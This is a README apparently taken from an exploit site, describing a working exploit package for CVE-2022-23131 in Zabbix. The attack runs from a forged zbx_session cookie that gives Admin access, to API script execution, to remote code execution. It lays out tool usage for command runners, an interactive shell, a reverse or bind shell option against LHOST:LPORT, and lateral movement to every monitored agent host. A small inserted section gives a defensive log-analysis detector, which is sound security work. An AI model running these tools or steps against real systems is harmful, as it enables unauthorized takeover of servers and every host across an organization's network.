## https://sploitus.com/exploit?id=BC1EFC7B-C6E0-528C-BD5D-A2D2ECE15187
# CVE-2022-23131 - Zabbix SAML SSO Authentication Bypass + RCE
## Overview
When SAML SSO is enabled, Zabbix stores session data in a client-side cookie (`zbx_session`) as a base64-encoded JSON blob. The server never verifies the signature of the `saml_data` field, allowing an unauthenticated attacker to forge the cookie and impersonate any user, including `Admin`.
With an Admin session, the Zabbix API's `script.create` / `script.execute` endpoints provide unauthenticated RCE on the Zabbix server and any host running the Zabbix agent.
**Affected versions:** Zabbix 5.4.0 - 5.4.8, 6.0.0 - 6.0.1 (SAML SSO must be enabled, non-default)
**CVSSv3:** 9.8 Critical
## How it works
### 1. Auth bypass
```
GET / -> zbx_session cookie contains:
{"sessionid": "abc...", "sign": "xyz..."}
Forge cookie:
{"saml_data": {"username_attribute": "Admin"}, "sessionid": "abc...", "sign": "xyz..."}
GET /index_sso.php with forged cookie -> 302 to /dashboard (logged in as Admin)
```
Zabbix trusts `saml_data.username_attribute` without signature verification.
### 2. RCE via API
```
POST /api_jsonrpc.php
script.create -> define a shell command
script.execute -> run it on the Zabbix server (execute_on=1)
or on a remote agent (execute_on=0)
script.delete -> clean up
```
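A defender-side check for the two steps above, added here as an example and not code from this repository: it decodes the base64 JSON `zbx_session` cookie on `/index_sso.php` requests and flags SSO logins whose `saml_data.username_attribute` names a built-in local account, and it flags a `script.create` followed by `script.execute` from the same source within a short window. The proxy-log record schema, the sample records and the assumption that SAML users are never mapped onto `Admin`/`guest` are mine.

```python
import base64
import json
from datetime import datetime, timedelta

# Built-in Zabbix accounts that a SAML assertion should never resolve to (assumption for this check).
LOCAL_ACCOUNTS = {"Admin", "guest"}
WINDOW = timedelta(minutes=5)  # create -> execute correlation window

def decode_zbx_session(cookie_value):
    """Decode the base64(JSON) zbx_session cookie; return a dict, or None if it does not parse."""
    try:
        return json.loads(base64.b64decode(cookie_value + "=" * (-len(cookie_value) % 4)))
    except ValueError:  # covers binascii.Error, JSONDecodeError and UnicodeDecodeError
        return None

def analyse(records):
    """records: dicts with ts, src, path, and cookie or method (constructed proxy-log schema).
    Returns a list of finding strings in log order."""
    findings = []
    last_create = {}  # src -> timestamp of the most recent script.create
    for r in records:
        ts = datetime.fromisoformat(r["ts"])
        if r["path"] == "/index_sso.php":
            sess = decode_zbx_session(r.get("cookie", "")) or {}
            user = (sess.get("saml_data") or {}).get("username_attribute")
            if user in LOCAL_ACCOUNTS:
                findings.append(f"{r['ts']} {r['src']}: SSO login as local account '{user}' via saml_data")
        elif r["path"] == "/api_jsonrpc.php":
            if r.get("method") == "script.create":
                last_create[r["src"]] = ts
            elif r.get("method") == "script.execute":
                t0 = last_create.get(r["src"])
                if t0 and ts - t0 <= WINDOW:
                    findings.append(f"{r['ts']} {r['src']}: script.execute within {WINDOW} of script.create")
    return findings

def _cookie(d):
    """Build a zbx_session cookie value the way the page describes it (base64 of JSON)."""
    return base64.b64encode(json.dumps(d).encode()).decode()

SAMPLE = [  # constructed records: one normal SAML login, one suspicious login plus API sequence
    {"ts": "2022-02-14T10:00:00", "src": "203.0.113.5", "path": "/index_sso.php",
     "cookie": _cookie({"saml_data": {"username_attribute": "alice"}, "sessionid": "a1", "sign": "s1"})},
    {"ts": "2022-02-14T10:01:00", "src": "198.51.100.9", "path": "/index_sso.php",
     "cookie": _cookie({"saml_data": {"username_attribute": "Admin"}, "sessionid": "a2", "sign": "s2"})},
    {"ts": "2022-02-14T10:01:30", "src": "198.51.100.9", "path": "/api_jsonrpc.php", "method": "script.create"},
    {"ts": "2022-02-14T10:01:35", "src": "198.51.100.9", "path": "/api_jsonrpc.php", "method": "script.execute"},
]
```

Running `analyse(SAMPLE)` yields two findings, both for `198.51.100.9`; the `alice` login produces none.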
## Tools
### `zbxcmd.py` - one-shot command runner
```bash
python3 zbxcmd.py -t https://TARGET -x "id"
# target a remote host via its Zabbix agent
python3 zbxcmd.py -t https://TARGET -x "id" --hostid 10453 --on agent
```
```
options:
-t, --target Zabbix base URL (required)
-u, --username Username to impersonate (default: Admin)
-x, --cmd Command to execute (required)
--hostid Zabbix hostid (default: first available host)
--on Execution context: server (default) or agent
```
### `zbxshell.py` - interactive pseudo-shell
Runs each command through the API (no reverse shell or network callback needed).
```bash
python3 zbxshell.py -t https://TARGET
# shell on a remote host via Zabbix agent
python3 zbxshell.py -t https://TARGET --hostid 10453 --on agent
```
```
options:
-t, --target Zabbix base URL (required)
-u, --username Username to impersonate (default: Admin)
--hostid Zabbix hostid (default: first available host)
--on Execution context: server (default) or agent
```
### `zbxapi.py` - interactive API enumeration
Menu-driven explorer covering users, hosts, macros, credentials, scripts, audit logs, and more.
```bash
python3 zbxapi.py -t https://TARGET
```
```
options:
-t, --target Zabbix base URL (required)
-u, --username Username to impersonate (default: Admin)
```
### `zabbix_session_exp.py` - original exploit (bypass + reverse/bind shell)
```bash
# auth bypass only
python3 zabbix_session_exp.py -t https://TARGET -u Admin
# reverse shell
python3 zabbix_session_exp.py -t https://TARGET -u Admin -r LHOST:LPORT
# bind shell on target
python3 zabbix_session_exp.py -t https://TARGET -u Admin -b PORT
```
## Lateral movement
List all hosts monitored by Zabbix, then execute commands on them via their agents:
```bash
# enumerate hosts
python3 zbxapi.py -t https://TARGET
# pick option 2: All hosts + IPs
# execute on a remote host
python3 zbxshell.py -t https://TARGET --hostid HOSTID --on agent
```
The Zabbix agent must have `EnableRemoteCommands=1` in its config (common in enterprise deployments). This effectively gives command execution on every host in the Zabbix inventory.
## Requirements
```
pip install requests
```
Python 3.7+
## References
- [NVD - CVE-2022-23131](https://nvd.nist.gov/vuln/detail/CVE-2022-23131)
- [Sonar Source writeup](https://blog.sonarsource.com/zabbix-case-study-of-unsafe-session-storage)
- [Zabbix advisory](https://support.zabbix.com/browse/ZBX-20350)